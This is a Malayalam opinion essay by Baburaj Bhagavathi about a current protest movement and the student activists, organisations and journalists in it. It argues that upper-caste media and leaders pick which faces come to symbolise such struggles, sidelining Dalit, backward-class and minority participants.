ഈ സമരത്തിലും നിരവധി പ്രതീകങ്ങള്‍ ഉയര്‍ന്നുവന്നിട്ടുണ്ട്. ജെഎന്‍യുവിലെ ഐസയുടെ നേതാവ് നേഹ ബോറ, കോക്രോച്ച് ജനതാപാര്‍ട്ടി നേതാവ് അഭിജീത് ദീപ്കെ, കേരളത്തില്‍നിന്നുള്ള പവിത്ര തുടങ്ങി നിരവധി യുവമുഖങ്ങളും ഒപ്പം പ്രമുഖരായ രാഷ്ട്രീയ-പൗരാവകാശ നേതാക്കളും ഇതിന്റെ പ്രതീകമായി മാറി. ത്രിവര്‍ണപതാകയും ചുവപ്പുകൊടികളും  പൊതുമണ്ഡലത്തില്‍ സമരപ്രതീകമായി. പാറ്റയാണ് മറ്റൊരു പ്രതീകം. പ്രത്യേകതരത്തിലുള്ള ടി ഷര്‍ട്ടുകളും ഈ സമരത്തില്‍ മാധ്യമശ്രദ്ധനേടി.

എന്നാല്‍ ഈ സമരം ഏകമുഖമല്ല. ദലിത്, പിന്നാക്ക, ന്യൂനപക്ഷ പശ്ചാത്തലത്തിലുള്ള വ്യക്തികളും സംഘടനകളും ഈ സമരത്തില്‍ പല തലങ്ങളിലും സജീവമാണ്. എസ്എഫ്ഐയും എഐഎസ്എഫും ഐസയും മാത്രമല്ല, ബാപ്‌സയും സമരത്തില്‍ സജീവമാണ്. എസ്‌ഐഓയും എംഎസ്എഫും നിരവധി പോരാളികളെ സംഭാവന ചെയ്തു. നൂറു കണക്കിന് പേര്‍ അറസ്റ്റ് ചെയ്യപ്പെട്ടു. ഡല്‍ഹി യൂനിവേഴ്സിറ്റി ബാഫഖി സ്റ്റഡി സര്‍ക്കിളിന്റെ ഉത്തരവാദിത്തമുള്ള റിയാന എന്ന എംഎസ്എഫ് നേതാവ് ഭയാനകമായ രീതിയിലാണ് ആക്രമിക്കപ്പെട്ടത്. എന്‍എസ്‍യുഐയുടെ ആതിര വിജയനാണ് മറ്റൊരാള്‍. ഫ്രറ്റേണിറ്റി മൂവ്‌മെന്റിന്റെ ഡല്‍ഹി സര്‍വകലാശാല യൂണിറ്റ് പ്രസിഡന്റ് റബീഹിന്റെയും ദേശീയ നേതാവ് ലുബൈബ് ബഷീറിന്റെയും ദൃശ്യങ്ങള്‍ സാമൂഹികമാധ്യമങ്ങളില്‍ വൈറലാണ്. ഹൈഫ ഷഫീഖ്, അഹമദ് സാജു, റമീസ് ഇകെ, നഈം ഗഫൂര്‍, തഷ്‌രീഫ് കെപി….ഇങ്ങനെ നിരവധി പേര്‍. ഫിദ ഫാത്തിമയെയും ജിബ്രാന്‍ ഉദ്ദിനെയും നദ സഈദയെയും പോലുള്ള നിരവധി മാധ്യമപ്രവര്‍ത്തകര്‍. ഇവരുടെ മുഖങ്ങള്‍ ഇന്ത്യന്‍ മാധ്യമപ്രേക്ഷകര്‍ക്ക് അത്രത്തോളം സജീവമല്ലെങ്കിലും സമാന്തര മാധ്യമങ്ങള്‍ക്ക് സജീവമാണ്. അന്താരാഷ്ട്രമാധ്യമങ്ങളും ഇവര്‍ക്ക് വേണ്ടത്ര ദൃശ്യത നല്‍കി. എന്നാല്‍ നാം നേരത്തെ കണ്ടതുപോലെ മലയാളി മാധ്യമപ്രവര്‍ത്തകര്‍ ഇവരെ നുഴഞ്ഞുകയറ്റക്കാരായാണ് കണ്ടത്. ചിലര്‍ ഫ്രോഡുകളായും ചിത്രീകരിച്ചു.

അധികാരത്തിന്റെ ഭാഷയും പ്രതിരോധത്തിന്റെ ഭാഷയും

അധികാരത്തിന്റെ ഭാഷ സവര്‍ണരുടേതാണ്. ഈ ഭാഷയിലാണ് അത് കീഴാളരോട് ഇടപെടുന്നത്. അതിനെതിരെയുള്ള പ്രതിരോധം ഈ അധികാരത്തെ ചോദ്യം ചെയ്യുന്നു. അതേസമയം പ്രതിരോധത്തിന്റെ ഭാഷയും തങ്ങളുടേതാവണമെന്ന് സവര്‍ണര്‍ കരുതുന്നു. അതുകൊണ്ടുതന്നെ ഏത് പ്രതിരോധത്തെയും അവര്‍ തങ്ങളുടെ പ്രതീകങ്ങളാല്‍  രേഖപ്പെടുത്താന്‍ ശ്രമിക്കുന്നു. ഈ രേഖപ്പെടുത്തല്‍ ബഹുമുഖമാണ്. പല മേഖലയിലുമുള്ളവര്‍ ഒത്തൊരുമിച്ച് പ്രവര്‍ത്തിച്ചാണ് ഇത് സാധ്യമാക്കുന്നത്. ഏത് സമരവും ഏതെങ്കിലും തരത്തിലുള്ള ഐക്യമുന്നണിയാണ്. ഈ ഐക്യമുന്നണിയില്‍നിന്ന് തങ്ങളുടേ നേതാക്കളെ അവര്‍ കണ്ടെത്തുകയും പൊതുമധ്യത്തില്‍ സമരമുഖങ്ങളായി അവതരിപ്പിക്കുകയും ചെയ്യുന്നു. പൗരത്വസമരത്തില്‍ മുഖങ്ങളായി ഉയര്‍ന്നുവന്ന വിദ്യാര്‍ത്ഥി നേതാക്കള്‍ ‘അസുഖകര’മായ ചോദ്യങ്ങളാല്‍ മായ്ക്കപ്പെട്ടതും മാഞ്ഞുപോയതും കണ്ടു. ആ സമരമുഖങ്ങളെ തള്ളിമാറ്റിയാണ് കനയ്യ കുമാര്‍ പോരാട്ടത്തിന്റെ ഇന്ത്യന്‍ മാതൃകയായി മാറിയത്. ഐഷി ഘോഷും വ്യത്യസ്തയല്ല. ഈ തിരഞ്ഞെടുപ്പ് നിഷ്‌കളങ്കമായി സംഭവിച്ചതല്ല. ദേശീയതലത്തില്‍ മാധ്യമങ്ങളുടെയും പൊതുബുദ്ധിജീവികളുടെയും മുന്‍കയ്യില്‍ സംഭവിച്ചതാണ്. അതേസമയം ഏത് സമരത്തിലും എല്ലാ വിഭാഗങ്ങളും കടന്നുപോകുന്നത് ഒരേതരം അനുഭവങ്ങളിലൂടെയല്ല. ഓരോരുത്തരുടെയും സാമൂഹ്യസ്ഥാനവും പദവിയും അവരുടെ അനുഭവങ്ങളെ നിര്‍ണയിക്കുന്നു. ഇത് പൗരത്വസമരപോരാളികള്‍ക്കും ബാധകമായിരുന്നു.

ഇന്ന് ഗ്യാനേഷ് കുമാറിനെതിരെ നടക്കുന്ന സമരവും അതില്‍നിന്ന് വ്യത്യസ്തമല്ല. ഇതുവരെ അധികാരത്തിന്റെ ഭാഗമായിരുന്നവര്‍ തന്നെയാണ് ഇന്ന് അധികാരത്തിനെതിരെ തിരിഞ്ഞിരിക്കുന്നത്. ഈ കോടതികളില്‍നിന്ന് ഒന്നും പ്രതീക്ഷിക്കുന്നില്ലെന്ന് കബില്‍ സിബല്‍ പറയുമ്പോള്‍ അത് ജനിച്ചപ്പോഴേ അനുഭവിക്കുന്നവരാണ് മതന്യൂനപക്ഷങ്ങളടക്കമുള്ള കീഴാളര്‍. ഇതിനര്‍ത്ഥം അധികാരത്തിന്റെ ഭാഗമായിരുന്നവരുടെ ഇടപെടലുകള്‍ തള്ളിക്കളയേണ്ടതാണ് എന്നല്ല. മറിച്ച് അവരുടെ ഇടപെടലാണ് ഈ സമരത്തെ ചരിത്രപരമാക്കുന്നത്. അതിനര്‍ത്ഥം ഈ പോരാട്ടം ഏകമുഖമാണെന്നല്ല, ദലിതരും പിന്നാക്കക്കാരും ന്യൂനപക്ഷങ്ങളും തുടങ്ങി എല്ലാ പ്രാന്തവല്‍കൃതജനവിഭാഗങ്ങളും തൊഴിലാളികളും വിവിധ തരത്തിലുള്ള പാര്‍ട്ടികളും ഇതിന്റെ ഭാഗമാണ്.

യാഥാര്‍ത്ഥ്യം ഇതായിരിക്കെത്തന്നെ സവര്‍ണരുടെ മുഖങ്ങളാല്‍തന്നെ ഈ പോരാട്ടത്തെ നിര്‍ണയിക്കണമെന്ന് സവര്‍ണരും അവരെ പിന്‍പറ്റുന്നവരും കരുതുന്നു. ഇത് സ്വാഭാവികമായി സംഭവിക്കുന്ന ഒന്നല്ല, അതിന്റെ പിന്നില്‍ ഒരു തിരഞ്ഞെടുപ്പുണ്ട്. ദേശീയമാധ്യമങ്ങളും ദേശീയനേതാക്കളും തുടങ്ങി അസംഖ്യം പേരുടെ ഇടപെടലുകളാണ് സമരത്തിന്റെ മുഖം ഏതായിരിക്കണമെന്ന് തീരുമാനിക്കുന്നത്. ജെഎന്‍യു വിദ്യാര്‍ത്ഥികള്‍ പോരാടുന്ന ഇന്ത്യന്‍ യുവാക്കളുടെ പ്രതീകമായി മാറിയതും ഇത്തരമൊരു തിരഞ്ഞെടുപ്പാണ്. മുന്‍കാലങ്ങളില്‍ കനയ്യ കുമാറും ഷെഹ്‌ല റാഷിദും പിന്നീട് ഐഷി ഘോഷും ഇപ്പോള്‍ നേഹ ബോറയും സമരമുഖങ്ങളായി മാറിയതും യാദൃശ്ചികമല്ല. ഈ തിരഞ്ഞെടുപ്പിലെ യാദൃശ്ചികത ചോദ്യംചെയ്യുന്നത് എന്‍എസ്‌യുഐ നേതാക്കള്‍ തന്നെയാണ്. അവര്‍ അവരുടെ ഔദ്യോഗിക വാട്‌സ് ആപ്പ് ഗ്രൂപ്പിന്റെ പേര് തന്നെ മാറ്റി, വി ദ ചോട്ടു എന്നാക്കി മാറ്റി. പറഞ്ഞുവരുന്നത് ഈ പോരാട്ടം ചില തിരഞ്ഞെടുക്കപ്പെടുന്ന മുഖങ്ങളാല്‍ രേഖപ്പെടുത്തപ്പെടുന്നത് ചിലരെങ്കിലും അതങ്ങനെയാവണമെന്ന് തീരുമാനിച്ചതുകൊണ്ടാണ്. അല്ലാതെ ‘യാഥാര്‍ത്ഥ്യം’ അതായതുകൊണ്ടല്ല.

ബാബുരാജ് ഭഗവതി